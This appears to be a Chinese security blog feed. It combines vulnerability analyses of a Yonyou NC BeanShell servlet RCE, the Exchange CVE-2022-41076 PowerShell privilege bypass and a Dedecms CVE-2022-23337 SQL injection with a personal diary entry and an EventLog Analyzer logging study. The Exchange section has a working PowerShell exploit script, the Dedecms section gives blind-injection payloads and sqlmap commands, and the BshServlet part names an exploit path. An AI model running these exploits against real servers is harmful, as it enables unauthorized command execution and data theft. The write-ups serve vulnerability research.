                msg = svcNotFoundMsgFormat.format(new Object[]{serviceName});
                Logger.error(msg, var76);
                throw new ServletException(msg);
            }

pathInfo

传参结果，moduleName 为 ali ， serviceName为 /bsh.servlet.BshServlet

跟进 this.getServiceObject() 方法

private Object getServiceObject(String moduleName, String serviceName) throws ComponentException {
        Object retObject = null;
        if (moduleName == null) {
            retObject = NCLocator.getInstance().lookup(serviceName); //模块名为空则调用此方法获取服务对象
        } else {
            retObject = serviceObjMap.get(moduleName + ":" + serviceName); //从缓存中获取服务对象
            if (retObject == null) { //如果缓存中没有
                Container deployed = BusinessAppServer.getInstance().getContainer(moduleName); //根据模块名获取对应的容器对象

                try {
									........
            }

            if (retObject != null) { //retObject不为空
                serviceObjMap.put(moduleName + ":" + serviceName, retObject);
            }
        }

        return retObject; //返回retObject
    }

在 BusinessAppServer.getInstance().getContainer() 中，根据模块名在nameModulesMap中获取对应的容器，228个模块名可利用

初始化方法中将/home/modules目录下的所有子目录放入HashMap

ServiceName兵分两路

getServiceObject之后兵分两路，主要分为两个方法触发漏洞

Service

obj 为 BshServlet@12592

接着启动线程监控器跟踪指定线程

						ThreadTracer.getInstance().startThreadMonitor("invokeservlet-" + serviceName + "-" + (obj == null ? "" : obj.getClass().getName()), request.getRemoteAddr() + ":" + request.getRemotePort(), "anonymous", (String)null);
						if (obj instanceof Servlet) { //判断obj是否实现了Servlet接口，是
                Logger.init(obj.getClass()); //初始化Logger

                try {
                    if (obj instanceof GenericServlet) { //是
                        ((GenericServlet)obj).init(); //初始化
                    }

                    this.preRemoteProcess(); //预处理
                    ((Servlet)obj).service(request, response); //调用obj的service()方法处理http请求
                    this.postRemoteProcess();
                } catch (ServletException var72) {
                    this.postErrorRemoteProcess(var72);
                    Logger.error("Invoker serlet: " + obj.getClass() + " error", var72);
                    throw var72;
                } catch (IOException var73) {
                    this.postErrorRemoteProcess(var73);
                    Logger.error("Invoker serlet: " + obj.getClass() + " error", var73);
                    throw var73;
                } catch (Throwable var74) {
                    this.postErrorRemoteProcess(var74);
                    Logger.error("Invoker serlet: " + obj.getClass() + " error", var74);
                    throw new ServletException("Invoker serlet: " + obj.getClass() + " error", var74);
                } finally {
                    Logger.reset();
                }
            }

obj对象BshServlet继承了HttpServlet 类，重写了doGet() 方法

跟进service方法：javax/servlet/http/HttpServlet.class$service()

serlvetMappings如下

经过 org/apache/catalina/connector/RequestFacade.class$getMethod() 方法之后调用当前对象BshServlet的doGet方法处理

注意，如果是POST方法，同样是传递到doGet中执行

bsh/servlet/BshServlet.class$doGet()

public void doGet(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
        String var3 = var1.getParameter("bsh.script"); //获取执行的脚本
        String var4 = var1.getParameter("bsh.client");
        String var5 = var1.getParameter("bsh.servlet.output");
        String var6 = var1.getParameter("bsh.servlet.captureOutErr");
        boolean var7 = false;
        if (var6 != null && var6.equalsIgnoreCase("true")) {
            var7 = true;
        }

        Object var8 = null;
        Exception var9 = null;
        StringBuffer var10 = new StringBuffer();
        if (var3 != null) {
            try {
                var8 = this.evalScript(var3, var10, var7, var1, var2); //调用evalScript方法处理脚本
            } catch (Exception var12) {
                var9 = var12;
            }
        }

        var2.setHeader("Bsh-Return", String.valueOf(var8));
        if ((var5 == null || !var5.equalsIgnoreCase("raw")) && (var4 == null || !var4.equals("Remote"))) {
            this.sendHTML(var1, var2, var3, var9, var8, var10, var7);
        } else {
            this.sendRaw(var1, var2, var9, var8, var10);
        }

    }

evalScript方法

Object evalScript(String var1, StringBuffer var2, boolean var3, HttpServletRequest var4, HttpServletResponse var5) throws EvalError {
        ByteArrayOutputStream var6 = new ByteArrayOutputStream();
        PrintStream var7 = new PrintStream(var6);
        Interpreter var8 = new Interpreter((Reader)null, var7, var7, false); //创建BeanShell解释器实例
        var8.set("bsh.httpServletRequest", var4);
        var8.set("bsh.httpServletResponse", var5);
        Object var9 = null;
        Object var10 = null;
        PrintStream var11 = System.out;
        PrintStream var12 = System.err;
        if (var3) {
            System.setOut(var7); //输出流重定向到PrintStream对象
            System.setErr(var7);
        }

        try {
            var9 = var8.eval(var1); //执行命令
        } finally {
            if (var3) {
                System.setOut(var11);
                System.setErr(var12);
            }

        }

        var7.flush();
        var2.append(var6.toString());
        return var9;
    }

跟进到 Interpreter.class$eval() 方法

public Object eval(String var1) throws EvalError {
        if (DEBUG) {
            debug("eval(String): " + var1);
        }

        return this.eval(var1, this.globalNameSpace);
    }

    public Object eval(String var1, NameSpace var2) throws EvalError {
        String var3 = var1.endsWith(";") ? var1 : var1 + ";";
        return this.eval(new StringReader(var3), var2, "inline evaluation of: ``" + this.showEvalString(var3) + "''");
    }

最后调用不同参数类型的eval方法

该方法创建一些新的BeanShell解释器实例，并将输入输出流、命令空间、调用堆栈等传入，逐行读取BeanShell脚本

并调用 BSHPrimaryExpression.class$eval() 方法执行命令，最后返回执行的结果var4

private Object eval(boolean var1, CallStack var2, Interpreter var3) throws EvalError {
        Object var4 = this.jjtGetChild(0);
        int var5 = this.jjtGetNumChildren();

        for(int var6 = 1; var6 < var5; ++var6) {
            var4 = ((BSHPrimarySuffix)this.jjtGetChild(var6)).doSuffix(var4, var1, var2, var3);
        }

        if (var4 instanceof SimpleNode) {
            if (var4 instanceof BSHAmbiguousName) {
                if (var1) {
                    var4 = ((BSHAmbiguousName)var4).toLHS(var2, var3);
                } else {
                    var4 = ((BSHAmbiguousName)var4).toObject(var2, var3);
                }
            } else {
                if (var1) {
                    throw new EvalError("Can't assign to prefix.", this, var2);
                }

                var4 = ((SimpleNode)var4).eval(var2, var3);
            }
        }

        if (var4 instanceof LHS) {
            if (var1) {
                return var4;
            } else {
                try {
                    return ((LHS)var4).getValue();
                } catch (UtilEvalError var8) {
                    throw var8.toEvalError(this, var2);
                }
            }
        } else {
            return var4;
        }
    }

BSHPrimaryExpression.class$eval()方法解析出解释器对象要执行的脚本参数，反射调用exec

在bsh/Name.class$invokeMethod中调用本地方法bsh/Name.class$invokeLocalMethod ,var6获取var2的类型为String，调用getCommand 方法

var7获取到执行的脚本位置/bsh/commands/exec.bsh，通过 BshClassManager.getClassManager().getResourceAsStream() 读取到该脚本内容到InputStream，之后调用bsh/NameSpace.class$loadScriptedCommand 方法加载脚本

exec.bsh用Runtime.getRuntime().exec执行传入的参数

后续简单看一下调用栈

返回到invokeLoaclMethod，var10为null，进入var9.invoke

跟进bsh/BshMethod.class$invoke()

invokeImpl()

private Object invokeImpl(Object[] var1, Interpreter var2, CallStack var3, SimpleNode var4, boolean var5) throws EvalError {
        Class var6 = this.getReturnType();
        Class[] var7 = this.getParameterTypes();
        if (var3 == null) {
            var3 = new CallStack(this.declaringNameSpace);
        }

        if (var1 == null) {
            var1 = new Object[0];
        }

        if (var1.length != this.numArgs) {
            throw new EvalError("Wrong number of arguments for local method: " + this.name, var4, var3);
        } else {
            NameSpace var8;
            if (var5) {
                var8 = var3.top();
            } else {
                var8 = new NameSpace(this.declaringNameSpace, this.name);
                var8.isMethod = true;
            }

            var8.setNode(var4);

            for(int var9 = 0; var9 < this.numArgs; ++var9) {
                if (var7[var9] != null) {
                    try {
                        var1[var9] = Types.getAssignableForm(var1[var9], var7[var9]);
                    } catch (UtilEvalError var17) {
                        throw new EvalError("Invalid argument: `" + this.paramNames[var9] + "'" + " for method: " + this.name + " : " + var17.getMessage(), var4, var3);
                    }

                    try {
                        var8.setTypedVariable(this.paramNames[var9], var7[var9], var1[var9], (Modifiers)null);
                    } catch (UtilEvalError var16) {
                        throw var16.toEvalError("Typed method parameter assignment", var4, var3);
                    }
                } else {
                    if (var1[var9] == Primitive.VOID) {
                        throw new EvalError("Undefined variable or class name, parameter: " + this.paramNames[var9] + " to method: " + this.name, var4, var3);
                    }

                    try {
                        var8.setLocalVariable(this.paramNames[var9], var1[var9], var2.getStrictJava());
                    } catch (UtilEvalError var15) {
                        throw var15.toEvalError(var4, var3);
                    }
                }
            }

            if (!var5) {
                var3.push(var8); //命令空间对象压入堆栈
            }

            Object var10 = this.methodBody.eval(var3, var2, true); //调用方法体eval
            CallStack var11 = var3.copy();
            if (!var5) {
                var3.pop();
            }

            ReturnControl var12 = null;
            if (var10 instanceof ReturnControl) {
                var12 = (ReturnControl)var10;
                if (var12.kind != 46) {
                    throw new EvalError("'continue' or 'break' in method body", var12.returnPoint, var11);
                }

                var10 = ((ReturnControl)var10).value;
                if (var6 == Void.TYPE && var10 != Primitive.VOID) {
                    throw new EvalError("Cannot return value from void method", var12.returnPoint, var11);
                }
            }

            if (var6 != null) {
                if (var6 == Void.TYPE) {
                    return Primitive.VOID;
                }

                try {
                    var10 = Types.getAssignableForm(var10, var6);
                } catch (UtilEvalError var18) {
                    SimpleNode var14 = var4;
                    if (var12 != null) {
                        var14 = var12.returnPoint;
                    }

                    throw var18.toEvalError("Incorrect type returned from method: " + this.name + var18.getMessage(), var14, var3);
                }
            }

            return var10;
        }
    }

这段代码定义了一个BeanShell解释器中的类BSHMethodInvocation，用于处理方法调用的执行。

在invokeImpl方法中，首先获取方法返回值和参数类型，然后判断参数个数是否匹配。如果匹配，则创建一个新的命名空间对象，并设置方法参数的值。在设置方法参数的值时，如果参数类型不为空，则调用Types.getAssignableForm方法将参数转化为可赋值的形式，并调用setTypedVariable方法设置参数的值；否则，直接调用setLocalVariable方法设置参数的值。

然后，将新的命名空间对象压入调用堆栈中，并调用方法体的eval方法计算方法体的值。在计算方法体的值时，如果方法体返回一个ReturnControl对象，则将其转化为返回值，并执行相应的控制流程（如continue和break）。如果方法返回值的类型不为空，将返回值转化为可赋值的形式，并返回该值。如果返回值的类型为空，则返回Primitive.VOID对象。

接着执行代码块

最后调用 BSHPrimaryInvocation.class$eval() 执行 exec.bsh 中的命令

doAction

以 /servlet/~ic/nc.bs.framework.mx.monitor.MonitorServlet 这个payload为例

同样在InvokerServlet.class$doAction() 中通过getServiceObject获取到obj为MonitorServlet对象

Exchange越权执行命令漏洞CVE-2022-41076复现分析

Sun, 10 May 2026 09:47:38 GMT

PS:简单记录一下过程中的关键步骤和数据，相关知识点未作科普，言之无文

环境

Windows Server 2016 x64

Exchange Server 2016 CU21 build15.1.2308.27

已知一个普通用户类型的Exchange账号密码

漏洞详情(CVE-2022-41076)

正常功能使用

普通exchange用户可以创建受限的远程powershell会话，此会话仅能运行白名单Exchange cmdlet+一些核心cmdlet，如Get-Command，Get-Mailbox，Get-Help等，代码如下

（参数备注：123123 为用户密码，ceshi\Administrator 为域\用户名，winser2016.ceshi.com 为主机名.域名）

$secureString = ConvertTo-SecureString -String "123123" -AsPlainText -Force
$UserCredential = New-Object System.Management.Automation.PSCredential -ArgumentList "ceshi\Administrator", $secureString
$sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://winser2016.ceshi.com/powershell -Credential $UserCredential -Authentication Kerberos -AllowRedirection -SessionOption $sessionOption
 
Invoke-Command -Session $Session -ScriptBlock {get-mailbox}

漏洞攻击过程

创建 powershell 会话时，攻击者传递 ApplicationArguments参数WSManStackVersion<3.0，在 initialSessionState 中启用公共 TabExpansion 函数，最终可以在受限的 powershell 会话中越权调用它。

此命令可以通过-line参数导入、加载任意模块，在此参数中利用路径遍历从文件系统中加载任意dll模块导入当前对话，自此可以不受限制的使用powershell危险的cmdletInvoke-Expression。利用代码如下

$secureString = ConvertTo-SecureString -String "123123" -AsPlainText -Force
$UserCredential = New-Object System.Management.Automation.PSCredential -ArgumentList "ceshi\Administrator", $secureString
$version = New-Object -TypeName System.Version -ArgumentList "2.0"
$mytable = $PSversionTable
$mytable["WSManStackVersion"] = $version
$sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck -ApplicationArguments @{PSversionTable=$mytable}
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://winser2016.ceshi.com/powershell -Credential $UserCredential -Authentication Kerberos -AllowRedirection -SessionOption $sessionOption
 
Invoke-Command -Session $Session -ScriptBlock { TabExpansion -line ";../../../../Windows/Microsoft.NET/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/v4.0_3.0.0.0__31bf3856ad364e35/Microsoft.PowerShell.Commands.Utility.dll\Invoke-Expression" -lastWord "-test" }
 
Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "[System.Security.Principal.WindowsIdentity]::GetCurrent().Name" } #获取当前用户名
 
Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "(new-object System.Diagnostics.Process)::Start('mspaint.exe')" } #起进程

对应 w3wp.exe 进程命令行参数

c:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangePowerShellAppPool" -v "v4.0" -c "C:\Program Files\Microsoft\Exchange Server\V15\bin\GenericAppPoolConfigWithGCServerEnabledFalse.config" -a \\.\pipe\iisipma9729832-72e5-4c1a-bc52-b65a3c673a69 -h "C:\inetpub\temp\apppools\MSExchangePowerShellAppPool\MSExchangePowerShellAppPool.config" -w "" -m 0

dnspy调试

路径 C:\Windows\System32\inetsrv 下，cmd命令 appcmd list wp 查看iis进程

dnspy附加对应进程（可通过POC起进程时其父w3wp.exe进程的命令行确定），调试→附加到进程，根据pid附加MSExchangePowerShellAppPool 的 w3wp.exe 进程

调试→窗口→模块，打开模块窗口，此处有两个System.Management.Automation.dll ，分别调试在DefaultDomain中和独立的Powershell appdomain中，经过下断点测试，参数传递的是独立app域中的dll，双击加载

C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

从分析文章 OWASSRF + TabShell 漏洞利用链 (viettelcybersecurity.com) 初步确定关键函数是加载外部模块的函数 LoadBinaryModule(Microsoft.PowerShell.Commands.ModuleCmdletBase)

打下断点启动调试

发poc，成功断下

三步攻击过程

第一步目录穿越加载外部dll（Import-Module）

在System.Management.Automation.CommandDiscovery类和LookupCommandInfo方法中。

首先使用 TryNormalSearch 方法，但如果找不到命令(null)，则将调用 TryModuleAutoLoading 方法。在 TryModuleAutoLoading 方法中，模块名称（text2 变量）将从 commandName 解析

然后模块将使用自动加载指定模块方法加载dll模块和cmdlet

在AutoloadSpecifiedMoudle方法cmdlet赋值为 Import-Module

接着来到 LoadBinaryModule 方法，查看局部变量获取到传入的 moduleName 和 fileName ，在此处加载dll

堆栈

返回到processrecord

第二步加载外部dll的cmdlet（Invoke-Expression）

在System.Management.Automation.CommandDiscovery类的LookupCommandInfo方法

在 System.Management.Automation.dll!System.Management.Automation.CommandDiscovery.TryModuleAutoLoading(string commandName, System.Management.Automation.ExecutionContext context, string originalCommandName, System.Management.Automation.CommandOrigin commandOrigin, System.Management.Automation.CommandInfo result, ref System.Exception lastError) (IL≈0x0182, Native=0x00007FFC4D902FD0+0x40D) 打下断点

这里拿到commandinfo为Invoke-Expression

此时的调用栈

后续CreateCommandProcessor

堆栈

第三步 cmdlet执行其他命令

接着上一步获取到iex的参数为

堆栈

返回值commandProcessorBase

堆栈

加载cmdlet后，在 Microsoft.Powershell.Commands.Utility.dll(appdomain)模块中 Microsoft.Powershell.Commands.InvokeExpressionCommand类断下，逐过程调试，在 System.Management.Automation.dll!System.Management.Automation.CommandProcessor.ProcessRecord() (IL=0x0175, Native=0x00007FFC4D86B9B0+0x50D) 获取到cmdlet的参数，即执行的命令

此时的调用栈

逐语句跟进到InvokeWithPipeLmpl ，经 RunVoid1 来到 Interpreter 的Run函数

执行命令

完整堆栈

最后返回值

继续调试另一个iex命令

解析iex命令的时候对new-object这个cmdlet又进行了lookup

此时调用栈

之后来到doexecute

此时堆栈

Dedecms article_coonepage_rule.php SQL注入漏洞(CVE-2022-23337)

Sun, 10 May 2026 09:47:38 GMT

0 漏洞概述

根据CVE官网的通告，2022年1月18日收录了Dedecms v5.7.87的一个sql注入漏洞，漏洞点存在于article_coonepage_rule.php，影响版本为v5.7.87。

有且仅有的一个参考链接已经失效无法访问，估计作者不再公开文章了。经过一番查找，发现网上没有任何相关的poc和文章，于是决定分析一下缘由并构造利用POC。

1 环境

1.1 影响版本

在官网查看更新日志，发现v5.7.88并未有对article_coonepage_rule.php 的相关更新描述和补丁，该漏洞在v5.7.89才修复

往前查看更新日志，直到v5.7.42该漏洞文件都未记录有更改，可以下载旧版本的进行复现

1.2 环境搭建

‣

笔者下载的是V5.7.80 UTF-8正式版 ，从日志上看，v5.7.88也是可行的。

💡其他组件版本： PHP 5.6.9nts Apache 2.4.39 MySQL 5.7.26

解压后访问 /install文件夹按照步骤进行安装即可

后台地址：http://your-ip/DedeCMS-5.7.80/dede/

2 漏洞形成

2.1 漏洞点

查看 /dede/article_coonepage_rule.php ，搜索 ids

只存在$action为del的代码中

从以上代码上看是通过传入id 从数据库中删除对应的note ，判断$action为del后还有另一个动作，即通过传入的id中是否含有逗号来判断是用户操作是单个删除还是多选删除

单个删除的时候用单引号将id括起，多选的时候用括号。目前看来没有对传入的id进行处理便直接拼接，笔者尝试构造请求

直接盲注没有成功

2.2 远程Debug

DeBug看看后端代码如何执行。

用phpstudy和phpstorm远程调试，搭建过程不赘述了，参考网上教程。
在如图位置打断点，开启debug侦听，发送payload

首先来到正则匹配判断

可以看到单引号被addslashes了，闭合不了

F7跟进到 \DedeSqli::ExecuteNoneQuery

这是一个不返回结果的SQL语句，所以联合注入也不会回显结果

继续跟进到 Init 函数，获取数据库连接参数信息

Open函数连接数据库

后续判断数据库版本后进入查询，返回 TRUE给Open函数

继续步入，跟进 SetQuery 函数

这一步主要是用配置文件中的数据库前缀(安装cms时指定)格式化代码中的数据表前缀

接着注意到有一个SQL语句安全检查代码

跳转看看

粗略看一下做了很多检查，可以防止绝大多数的sql注入攻击了

遗憾的是，这里的sql语句并没有进到检查，原因是初始化的时候 $safeCheck 为 false ，并且在此函数中没有赋为 true

所以直接跳过这段 CheckSql

后面一个ExecTime函数计算执行时间，mysqli_query 函数返回 false

ExecuteNoneQuery 返回 false

最后回到 dede/article_coonepage_rule.php

查询 co_onepage 表中的数据并渲染

过程中传入id后执行删除操作，页面显示的内容为独立的代码从数据库中查出，用户不可控，所以没有对应的注入回显，只能将思路转到报错和盲注

3 POC构造探索

后续试了用宽字节和其他字符对单引号进行闭合都没有成功，但是转念一想，就算能闭合引号，但是长的注入语句一般都会有逗号出现，出现了逗号就进入了另一条用括号包裹的sql语句，也就不需要上一步的闭合引号操作了

3.1 报错注入？

由于是白盒，直接到后台构造报错语句

可以看到这个表有6个字段

模仿后端sql语句构造联合查询报错extractvalue(0x0a,concat(0x0a,(select+database())))

试一下发数据

传入后端语句也是跟在phpmyadmin查询时一样的

可惜并没有报错回显

3.2 盲注！

那就试试盲注了，先构造试一下

ids=(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))ItPM)

没有延迟返回

sqlmap开跑，指定level和注入类型，dump数据库

python2 sqlmap.py -r ../../dede1.txt -p ids --level 5  --technique T --dbs

最初用的 level2、3、4都没成功，直到用 5才跑了出来

最后是用ELT 跑出来的盲注

附上验证payload

/DedeCMS-5.7.80/dede/article_coonepage_rule.php?action=del&ids=ELT(3337>3336,SLEEP(5))

数据库

ids=ELT(ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),1,1))!=116,SLEEP(3))

其他类推

4 修复

看一下后续版本修复的代码

weekly-0216-除夕

Sun, 10 May 2026 09:47:38 GMT

影

在看《一饭封神》，看完了。最喜欢的就是David黎子安，一种与世无争、慢条斯理的态度，全场都在喝啤酒，整天看起来脸红红，本身又是米其林大厨，料理水平高到每次都让评委咂舌，所有食材的搭配与调味之平衡，以及出乎意料的搭配与烹饪方式，又在情理之中，完全带有David本人的风格，拥有独特绝佳的品味（taste），这种世外高人一样的风格，拥有极度的松弛感和专业能力，正是我所追求的状态。

印象最深的就是刘嘉玲来做试菜嘉宾时跟David寒暄，David说「我每日都喺度怀疑紧人生～」，还有最后的「做个不失礼的菜，让评委有借口可以淘汰掉我」，不失礼三个字境界太高啦。

书

这周在看《十年一觉电影梦》，「父亲三部曲」集中讲家庭、父亲与传承。看到「饮食男女」篇章了，感受特别深。李安说在台湾地区反响并不好，被狠狠修理了，然播出很多年后，世界各地依旧有人来跟他说，也许就是一句

我爸爸去世前，病得有一年多没跟家人讲话，可是临走前，我们陪他看《饮食男女》录影带，他唯一跟我们开口沟通，就是讲这部片子。

李安也常觉得迷惑。

今年我开始练习做菜，亲力亲为也切身体会，做菜备菜忙忙碌碌，处理食材烹饪能力略有提升与体会。此番春节假期回家，我可多进厨房帮忙处理食材与打下手煎简单的菜，餐桌上的饭菜有了我的一份参与，似乎可以让妈妈少一点那么累，期间也可多与妈妈交流讨论食材处理方式与烹调手法，让妈妈少一点那么无聊。妈妈三十多年的烹饪经验，可以算是家庭式大厨，一进厨，我轻松就可以得到烹饪秘笈，这种进厨房的信任与平等地交流传授是从没有过的经验。

饮食，真会把家庭联结在一起。

照王蕙玲的讲法是：“吃、饮食是台面上的东西，欲望、男女则是台面下的东西，台面下的东西永远不能拿到台面上来讨论”

性是家庭的根源，男女有性，有性才有孩子，代代才能相传，中国家庭却从不讨论性与男女欲望，是个禁忌。而台面上的吃、饮食，才是在有了家庭之后，将家庭联结起来的纽带。

行

一回家，就仿佛拥有了「全屋智能」。

半夜回到家，是有自动准备好的夜宵可以吃的；房间的保温杯是自动装满温水的；地上总是一层不染的；衣服总是会自动晾起来，晒出去。

对EventLog Analyzer数据库日志功能实现的简单分析

Sun, 10 May 2026 09:47:38 GMT

0. EventLog Analyzer简介

EventLog Analyzer是卓豪旗下一款安全信息和事件管理（SIEM）软件，用于实时监控网络设备、应用程序和操作系统的日志数据。它能够自动化地处理日志数据，并生成报告，以帮助安全管理员及时检测和响应潜在的威胁。EventLog Analyzer还可以分析日志数据，识别内部和外部威胁，并提供警报和通知，以支持快速响应和修复。此外，它还能够跟踪符合法规要求的日志记录，并生成符合各种合规性标准的报告。

本文是对其数据库日志模块功能实现的简单分析，在想要实现类似功能的时候可以作为参考。

1. DLL文件

首先从进程中定位到一个可疑的收集日志进程 SysEvtCol.exe ，从名字上看应该是日志收集的exe，位置：

C:\ManageEngine\EventLog_Analyzer\EventLog Analyzer\bin\SysEvtCol.exe

但是从其调用的dll来看，一时间没有有效发现

往上回看其父进程

C:\ManageEngine\EventLog_Analyzer\EventLog Analyzer\jre\bin\java.exe

先筛除系统dll，排查EA自带的可疑dll。从名字上看发现一个importLog.dll

C:\ManageEngine\EventLog_Analyzer\EventLog Analyzer\lib\native\importLog.dll

查看引用的dll，很明显看到有 ADVAPI32.dll 的相关eventlog函数

通过导出的函数名猜测此部分是获取sa用户服务的EventLog

接着注意到AdventnetOper.dll ，进一步查看发现有许多注册表键值和环境变量之类的增删改查函数，结合导出函数名猜测是操作注册表部分

2. 格式文件

将SysEvtCol.exe导入IDA

在 ../logs 目录中打开 eventlog.txt

从 winLogs 内容上看猜测是EA向其数据库获取EVENTLOG内容的查询日志

根据parserLogs的记录查看MSSQL.xml

明显是解析EVENTLOG日志中MSSQL的格式文件

应该是软件先获取到所有的EVENT日志，存进pgsql数据库后，通过不同的xml格式文件分类提取到前端

3. IDEA反编译

文件夹导入idea反编译

根据 importLog.dll 的 Export 定位到文件\ManageEngine\EventLog_Analyzer\EventLog Analyzer\lib\EventLogService.jar!\com\adventnet\sa\server\imp\ImportEvtLogs.class

native方法引用了本地库，猜测关键的导入 event 操作还是在 importLog.dll 中

将 importLog.dll 导入ida

cpp编译的dll

调用了ADVAPI32.dll 中相关的EventLog函数

microsoftlearn用法：https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-readeventloga

4. 审核日志

默认审核日志是关闭的，可在ssms中开启

此处被写入了应用程序日志，日志记录如下

相关的注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\MSSQL$<InstanceName>$Audit\EventSourceFlags ，此值为0时，不允许通过多个服务器审核事件向SQL Server安全日志写入

取出eventLog写入文件

5. SQL注入测试

搭建靶场：https://github.com/Larryxi/MSSQL-SQLi-Labs

注入时间是 17:29

审计日志中记录了对应的查询语句

有对应的事件，但是没有sql攻击报表（即没有识别出为sql注入）

跑sqlmap进行测试，时间 11:14

sqlmap -u 'http://192.168.249.212/sqli/MSSQL-SQLi-Labs/less-1.asp?id=1' -p id --level 5 --dbs -vvv

应用程序日志中均有记录

后端也正常收集

但sql注入报表(预定义报表)部分没有数据

编辑不了预定义报表，也无法查看预定义报表的内容。

自定义一个简单的报表测试，内容为数据库查询语句中包含CASE WHEN字符 ，选择设备为本机器，默认日志来源是windows eventlog

可推测预定义报表的来源也是默认的windows eventlog ，但是由于内置规则没识别出注入语句，

调整payload后再次测试sql，特征明显，有闭合单引号有注释符，时间 16:10

修改一下自定义报表条件

自定义报表可识别

推测：根据内置/自定的规则从eventlog中筛选出sql注入事件

6. 开启审计日志

eventlog详情如下，eventid:33205，通过JDBC连接数据库开启审核和审核策略

💡审核事件: audit_schema_version:1 event_time:2022-11-30 06:51:16.3535404 sequence_number:1 action_id:AUSC succeeded:true is_column_permission:false session_id:53 server_principal_id:1 database_principal_id:0 target_server_principal_id:0 target_database_principal_id:0 object_id:0 user_defined_event_id:0 transaction_id:0 class_type:A duration_milliseconds:0 response_rows:0 affected_rows:0 client_ip:192.168.249.217 permission_bitmask:00000000000000000000000000000000 sequence_group_id:00000000-0000-0000-0000-000000000000 session_server_principal_name:sa server_principal_name:sa server_principal_sid:01 database_principal_name: target_server_principal_name: target_server_principal_sid: target_database_principal_name: server_instance_name:DESKTOP-1P14TIC database_name: schema_name: object_name: statement: additional_information:<action_info xmlns="http://schemas.microsoft.com/sqlserver/2008/sqlaudit_data"><session><![CDATA[ME_LOG3609eba5bb3_96a5_488a_86de_7da88d6bcddd$A]]></session><action>event enabled</action><startup_type>manual</startup_type><object><![CDATA[audit_event]]></object></action_info> user_defined_information: application_name:jTDS connection_id:9F7DA3E0-7681-433F-B490-75CFB8F976AA data_sensitivity_information: host_name:DESKTOP-1P14TIC

开启审核sql语句

USE [master]
GO

/****** Object:  Audit [ME_LOG3609eba5bb3_96a5_488a_86de_7da88d6bcddd]    Script Date: 2022/11/30 15:23:10 ******/
CREATE SERVER AUDIT [ME_LOG3609eba5bb3_96a5_488a_86de_7da88d6bcddd]
TO APPLICATION_LOG WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE, AUDIT_GUID = '000f42ac-3e36-46c8-9903-5d24c6d97dbb')
ALTER SERVER AUDIT [ME_LOG3609eba5bb3_96a5_488a_86de_7da88d6bcddd] WITH (STATE = ON)
GO

新建审核策略sql语句

USE [master]
GO

CREATE SERVER AUDIT SPECIFICATION [ME_LOG360a9914bde_1851_49bd_ab19_8ed8393992c1]
FOR SERVER AUDIT [ME_LOG3609eba5bb3_96a5_488a_86de_7da88d6bcddd]
ADD (SCHEMA_OBJECT_ACCESS_GROUP),
ADD (DATABASE_ROLE_MEMBER_CHANGE_GROUP),
ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP),
ADD (FAILED_LOGIN_GROUP),
ADD (SUCCESSFUL_LOGIN_GROUP),
ADD (DATABASE_CHANGE_GROUP),
ADD (DATABASE_OBJECT_CHANGE_GROUP),
ADD (DATABASE_PRINCIPAL_CHANGE_GROUP),
ADD (SCHEMA_OBJECT_CHANGE_GROUP),
ADD (SERVER_PRINCIPAL_CHANGE_GROUP),
ADD (LOGIN_CHANGE_PASSWORD_GROUP),
ADD (SERVER_STATE_CHANGE_GROUP)
WITH (STATE = ON)
GO

审核策略相关sql语句


EXEC sp_altermessage 211,'WITH_LOG',TRUE  #将现有消息211记录到windows应用程序日志中
EXEC sp_altermessage 427,'WITH_LOG',TRUE
610,2509,2510,2514,8440,9100,15612,15615.....


SELECT MAX(SUSER_SNAME([Transaction SID])) USERNAME , @@ServerName servername, DB_NAME() dbname,MAX([Begin Time]) BEGINTIME,MAX([End Time]) ENDTIME,MAX([Transaction SID]) TransactionSID,MAX(AllocUnitName) AllocUnitName,MAX([Current LSN]) CURR FROM fn_dblog(NULL,NULL) WHERE [Transaction ID] IN (SELECT distinct([Transaction ID]) FROM fn_dblog(NULL,NULL) WHERE  OPERATION='LOP_DELETE_ROWS' ) Group by [Transaction ID] ORDER BY CURR ASC

select @@SERVERNAME,LOGINNAME,SID,CREATEDATE,UPDATEDATE,SYSADMIN,SECURITYADMIN,SERVERADMIN,SETUPADMIN,PROCESSADMIN,DISKADMIN,DBCREATOR,BULKADMIN,REPLACE(RTRIM(LTRIM(REPLACE((case when SYSADMIN = 1 then 'SysAdmin,' else '' end) + (case when SECURITYADMIN = 1 then 'SecurityAdmin,' else '' end) +(case when SERVERADMIN = 1 then 'ServerAdmin,' else '' end) +(case when SETUPADMIN = 1 then 'SetupAdmin,' else '' end) + (case when PROCESSADMIN = 1 then 'ProcessAdmin,' else '' end) + (case when DBCREATOR = 1 then 'DBCreator,' else '' end) + (case when BULKADMIN = 1 then 'BulkAdmin,' else '' end),',',' '))),' ',',')as Roles from master..syslogins where updatedate > '1800-01-01 00:00:00.000'

参考：https://learn.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-altermessage-transact-sql?view=sql-server-ver16

7. 策略相关事件id列表

共45个id，

EXEC sp_altermessage 211,'WITH_LOG',TRUE   #将现有消息211记录到windows应用程序日志中
EXEC sp_altermessage 28048,'WITH_LOG',TRUE
EXEC sp_altermessage 18488,'WITH_LOG',TRUE
EXEC sp_altermessage 18487,'WITH_LOG',TRUE
EXEC sp_altermessage 18486,'WITH_LOG',TRUE
EXEC sp_altermessage 18471,'WITH_LOG',TRUE
